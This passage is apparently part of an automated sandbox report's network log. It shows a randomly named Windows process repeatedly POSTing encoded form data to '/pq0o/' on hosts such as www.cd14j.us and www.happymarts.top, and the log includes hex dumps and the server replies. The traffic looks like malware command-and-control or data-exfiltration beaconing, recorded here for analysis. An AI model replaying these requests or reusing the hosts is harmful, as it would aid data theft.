53 77 55 30 54 6b 5a 6b 74 56 44 2f 55 33 43 62 39 62 6c 78 43 32 52 4f 45 74 6a 6d 76 4c 61 72 35 69 55 4d 62 74 49 79 70 46 51 6a 31 63 77 32 35 77 58 6a 79 75 65 32 6d 37 64 50 42 74 7a 6e 58 64 6e 30 41 45 71 4a 6a 69 30 73 48 58 31 67 61 6e 31 43 53 6c 2b 4d 46 6a 56 43 30 39 71 52 72 57 56 78 49 79 31 55 63 7a 34 3d Data Ascii: F49hs=+fghJfJWtdSXuSZwzv1QI8ZAY6rPo+ThzqGFWQdpd0SEebv47BZpShXj/NKTysTitGqwy2KHxAUq72G2ki19EW8ui5Vky41FIeiPVQTFinPLSwU0TkZktVD/U3Cb9blxC2ROEtjmvLar5iUMbtIypFQj1cw25wXjyue2m7dPBtznXdn0AEqJji0sHX1gan1CSl+MFjVC09qRrWVxIy1Ucz4=
Apr 24, 2024 09:21:35.439516068 CEST	701	IN	HTTP/1.1 405 Not Allowed date: Wed, 24 Apr 2024 07:21:35 GMT content-type: text/html content-length: 556 server: NginX connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49750	91.195.240.123	80	2412	C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe

Timestamp	Bytes transferred	Direction	Data
Apr 24, 2024 09:21:37.964201927 CEST	10704	OUT	POST /pq0o/ HTTP/1.1 Host: www.cd14j.us Accept: / Accept-Language: en-us Accept-Encoding: gzip, deflate Origin: http://www.cd14j.us Content-Length: 10302 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.cd14j.us/pq0o/ User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) LinkCheck by Siteimprove.com Data Raw: 46 34 39 68 73 3d 2b 66 67 68 4a 66 4a 57 74 64 53 58 75 53 5a 77 7a 76 31 51 49 38 5a 41 59 36 72 50 6f 2b 54 68 7a 71 47 46 57 51 64 70 64 30 61 45 65 70 33 34 38 57 6c 70 54 68 58 6a 33 74 4b 53 79 73 54 46 74 47 6a 37 79 32 47 39 78 43 63 71 37 58 6d 32 6c 58 56 39 64 47 38 75 67 35 56 6c 38 59 31 63 49 65 53 44 56 55 50 46 69 6e 50 4c 53 32 6f 30 46 46 5a 6b 72 56 44 2b 54 33 43 50 75 4c 6c 4a 43 32 4a 34 45 74 6d 62 75 34 53 72 36 43 45 4d 63 66 77 79 68 46 51 68 34 38 77 75 35 77 62 77 79 75 54 4a 6d 37 70 6c 42 71 54 6e 62 73 53 53 63 48 7a 58 34 68 39 7a 64 30 5a 4c 57 46 5a 73 64 45 4b 6c 49 52 68 6b 67 75 7a 7a 6e 45 73 66 63 54 38 66 4c 57 6b 43 77 4c 6c 5a 59 35 6e 4f 77 62 2f 74 32 66 55 53 30 44 57 57 47 5a 77 34 6e 5a 68 33 37 6b 47 42 57 74 42 32 6d 76 4e 63 70 5a 67 73 4b 39 46 37 42 2f 66 52 49 2b 46 77 2b 36 52 49 62 41 4e 31 2b 6a 2b 56 76 67 71 44 6e 49 4e 35 48 56 46 55 62 57 6f 2b 2b 72 62 71 6b 66 4b 38 70 33 55 65 67 75 54 5a 6f 37 44 41 71 69 76 74 76 66 52 39 70 63 51 30 79 68 77 56 76 58 70 78 43 31 46 6e 73 78 6a 4e 6c 57 36 6d 43 5a 59 50 36 63 48 5a 4b 2b 68 6c 76 30 62 70 66 4b 4b 34 73 7a 34 70 30 54 75 4f 32 48 76 69 49 32 4e 6d 42 65 64 76 50 75 2b 31 37 4e 6d 50 64 48 36 6b 65 64 76 45 46 68 59 45 57 73 55 41 34 53 43 65 6c 6e 55 62 72 69 30 4f 62 62 43 67 61 4a 36 31 41 39 7a 45 69 74 36 54 75 30 34 49 78 44 41 4d 67 77 5a 30 4c 45 43 32 63 39 4d 77 6e 54 62 63 72 37 77 6a 30 32 71 32 78 64 37 33 30 6f 30 50 49 56 76 5a 65 31 68 4f 41 65 72 73 51 36 74 79 43 77 72 38 2f 69 33 65 76 66 6a 6c 52 75 65 35 2b 6e 62 54 59 79 79 42 48 31 78 48 6e 51 2f 66 42 2b 63 76 79 4a 76 31 39 38 5a 54 71 74 4d 63 57 43 75 5a 57 79 55 42 58 4a 6a 57 6d 72 55 64 35 39 4e 32 37 71 69 71 4b 5a 64 68 43 63 72 64 58 76 30 77 5a 4d 36 6a 46 35 65 56 56 52 5a 73 59 75 37 76 7a 45 4d 76 69 64 47 50 32 5a 4b 77 49 33 58 2f 47 47 43 74 72 68 78 62 6f 54 37 6d 44 64 63 72 76 66 2b 35 70 6f 36 55 6b 74 53 55 38 6f 53 67 74 5a 53 58 5a 4a 36 75 67 42 34 2b 48 2b 76 34 64 4a 73 63 6f 71 69 54 48 68 71 70 34 70 61 65 74 4e 77 6c 73 64 32 31 47 71 58 30 73 54 31 41 51 61 56 6f 45 33 70 72 33 31 43 38 57 4e 59 5a 77 74 43 75 73 31 66 32 51 64 79 4b 4c 6c 6f 52 58 49 35 54 6b 42 48 30 33 56 48 71 39 33 31 38 32 35 75 34 77 51 4c 55 42 52 76 69 6a 38 73 4b 31 61 62 58 74 6c 79 7a 56 6a 71 31 75 50 63 71 61 2b 39 33 4a 5a 4a 36 4e 73 58 6d 59 69 41 30 68 71 69 33 68 76 32 41 57 44 4c 75 35 2b 6e 6a 30 74 53 43 78 4a 57 4a 61 77 35 66 49 6b 4d 6e 59 35 4f 44 4e 69 47 55 63 30 6c 62 6c 54 4c 6a 52 4f 43 69 78 30 78 44 44 5a 4d 36 4b 69 65 52 79 61 54 72 52 46 63 57 77 30 6e 5a 4d 6c 71 39 31 63 31 45 51 4a 6f 4a 34 64 6d 53 6d 79 4e 37 52 69 4c 70 51 5a 52 54 4e 58 38 72 61 51 4d 61 5a 30 33 62 76 47 71 73 53 61 69 65 30 7a 68 76 6d 76 45 68 74 42 74 55 57 39 7a 57 77 74 56 75 48 68 32 2b 75 55 49 36 53 64 4c 7a 54 49 47 4d 58 6e 32 4c 35 50 37 5a 41 43 57 47 32 41 6d 65 76 51 49 38 32 72 54 49 45 4b 75 4c 79 62 66 33 31 53 39 4b 30 59 36 61 39 62 45 77 32 72 46 62 4c 61 4a 6d 43 6c 4f 51 41 4a 61 38 45 68 76 5a 49 42 4f 4d 6c 4f 35 48 63 31 41 6b 35 76 38 51 35 4f 4d 72 2f 6d 4c 4e 6a 6f 61 78 75 71 7a 55 30 65 6d 51 62 7a 7a 52 43 34 55 46 6d 47 76 31 57 30 34 43 72 6c 6e 72 68 43 55 50 6e 4f 63 42 65 6a 6d 64 42 37 39 58 4e 41 6d 46 65 44 54 46 44 63 4b 51 30 30 67 4b 43 44 56 61 54 72 75 31 61 4e 50 68 72 54 48 36 48 56 32 70 31 51 4a 51 75 4e 2b 48 52 61 66 66 49 67 30 59 68 4a 72 62 53 6f 59 52 54 36 67 58 4b 56 57 4d 4c 46 55 59 45 75 75 2f 44 7a 33 62 68 39 55 74 4f 61 58 57 32 61 4e 52 76 41 73 78 5a 4a 65 77 46 76 62 78 34 43 64 36 6d 68 62 44 44 68 2f 55 71 45 78 6e 7a 61 44 51 67 73 44 49 54 6d 43 2f 62 47 51 47 6c 37 77 6c 65 49 50 52 37 58 30 76 43 61 65 71 70 61 35 4b 6e 76 6c 5a 6a 59 57 4b 74 57 63 7a 57 52 46 43 53 51 79 66 6b 6f 45 47 77 6e 39 32 4d 45 48 48 6b 72 69 45 44 37 4d 50 6c 39 76 70 37 32 6a 6e 33 79 68 38 67 45 37 70 65 37 37 53 7a 43 4a 49 58 38 52 41 78 59 6e 36 2b 44 68 6c 37 2f 52 50 57 52 65 32 4e 30 30 76 4f 6f 32 4e 43 51 6d 50 2b 65 55 4f 64 44 34 63 5a 6b 58 55 39 77 48 49 76 Data Ascii: F49hs=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
Apr 24, 2024 09:21:38.273336887 CEST	701	IN	HTTP/1.1 405 Not Allowed date: Wed, 24 Apr 2024 07:21:38 GMT content-type: text/html content-length: 556 server: NginX connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49751	91.195.240.123	80	2412	C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe

Timestamp	Bytes transferred	Direction	Data
Apr 24, 2024 09:21:41.098849058 CEST	354	OUT	GET /pq0o/?9ZZXx=T6kxVZuXAVuH9J&F49hs=zdIBKqN9oP3plxVQyNgvYq0mMKrvq5q/57+iRklTGjPKULzejm8MTR3zmbqN1d/mp0y1+1mzyQU/+H24oE5uDnI7sp5jy5UFN+aaU0u6oQX+YH9icEJ0mm4= HTTP/1.1 Host: www.cd14j.us Accept: / Accept-Language: en-us Connection: close User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) LinkCheck by Siteimprove.com
Apr 24, 2024 09:21:41.441888094 CEST	107	IN	HTTP/1.1 439 date: Wed, 24 Apr 2024 07:21:41 GMT content-length: 0 server: NginX connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49752	203.161.46.103	80	2412	C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe

Timestamp	Bytes transferred	Direction	Data
Apr 24, 2024 09:21:55.368951082 CEST	620	OUT	POST /pq0o/ HTTP/1.1 Host: www.happymarts.top Accept: / Accept-Language: en-us Accept-Encoding: gzip, deflate Origin: http://www.happymarts.top Content-Length: 202 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.happymarts.top/pq0o/ User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) LinkCheck by Siteimprove.com Data Raw: 46 34 39 68 73 3d 31 57 71 44 4a 74 77 77 6a 38 2b 79 69 2b 79 6e 45 2b 73 2f 54 56 76 51 59 71 70 37 2f 31 36 63 7a 33 56 6b 57 55 75 52 41 79 33 6c 4e 36 70 36 61 69 63 6a 55 37 59 2b 75 30 67 48 4c 72 61 63 6f 61 73 72 57 4f 33 45 4e 46 44 76 47 2f 59 76 54 46 65 56 4b 74 4a 70 4b 38 4b 52 35 4e 64 52 56 66 57 54 4b 43 71 75 79 55 34 34 45 50 64 41 37 56 7a 56 72 58 6f 62 65 65 55 2b 4e 70 71 68 4c 47 72 35 6b 59 73 36 54 38 66 78 38 6e 6a 6b 56 67 73 2f 67 54 42 42 49 52 61 75 69 46 68 6f 30 6b 78 53 35 44 36 57 76 37 4f 4b 73 76 74 70 4f 2f 71 72 78 63 53 49 68 31 77 42 67 4e 59 50 30 67 3d 3d Data Ascii: F49hs=1WqDJtwwj8+yi+ynE+s/TVvQYqp7/16cz3VkWUuRAy3lN6p6aicjU7Y+u0gHLracoasrWO3ENFDvG/YvTFeVKtJpK8KR5NdRVfWTKCquyU44EPdA7VzVrXobeeU+NpqhLGr5kYs6T8fx8njkVgs/gTBBIRauiFho0kxS5D6Wv7OKsvtpO/qrxcSIh1wBgNYP0g==
Apr 24, 2024 09:21:55.554104090 CEST	533	IN	HTTP/1.1 404 Not Found Date: Wed, 24 Apr 2024 07:21:55 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49753	203.161.46.103	80	2412	C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe

Timestamp	Bytes transferred	Direction	Data
Apr 24, 2024 09:21:58.074043036 CEST	640	OUT	POST /pq0o/ HTTP/1.1 Host: www.happymarts.top Accept: / Accept-Language: en-us Accept-Encoding: gzip, deflate Origin: http://www.happymarts.top Content-Length: 222 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.happymarts.top/pq0o/ User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) LinkCheck by Siteimprove.com Data Raw: 46 34 39 68 73 3d 31 57 71 44 4a 74 77 77 6a 38 2b 79 6b 76 43 6e 44 66 73 2f 59 56 76 54 42 71 70 37 6b 6c 37 56 7a 33 5a 6b 57 57 44 61 44 48 48 6c 4e 61 5a 36 49 6a 63 6a 45 72 59 2b 36 45 67 4f 45 4c 62 65 6f 61 68 57 57 50 4c 45 4e 46 48 76 47 2b 6f 76 51 32 6d 61 4b 39 4a 52 46 63 4b 58 39 4e 64 52 56 66 57 54 4b 43 2b 41 79 55 77 34 45 2b 74 41 35 30 7a 4b 6f 58 6f 61 5a 65 55 2b 47 4a 71 66 4c 47 71 71 6b 5a 78 56 54 35 62 78 38 6e 54 6b 57 78 73 38 71 54 42 39 56 42 61 35 6c 32 49 6c 2b 48 49 63 77 6a 79 61 79 2f 43 36 6b 4a 38 7a 66 4f 4c 38 6a 63 32 37 38 79 35 31 74 4f 6c 47 76 70 6a 4f 46 4e 2b 42 58 59 38 43 52 63 56 65 43 30 63 67 36 36 41 3d Data Ascii: F49hs=1WqDJtwwj8+ykvCnDfs/YVvTBqp7kl7Vz3ZkWWDaDHHlNaZ6IjcjErY+6EgOELbeoahWWPLENFHvG+ovQ2maK9JRFcKX9NdRVfWTKC+AyUw4E+tA50zKoXoaZeU+GJqfLGqqkZxVT5bx8nTkWxs8qTB9VBa5l2Il+HIcwjyay/C6kJ8zfOL8jc278y51tOlGvpjOFN+BXY8CRcVeC0cg66A=
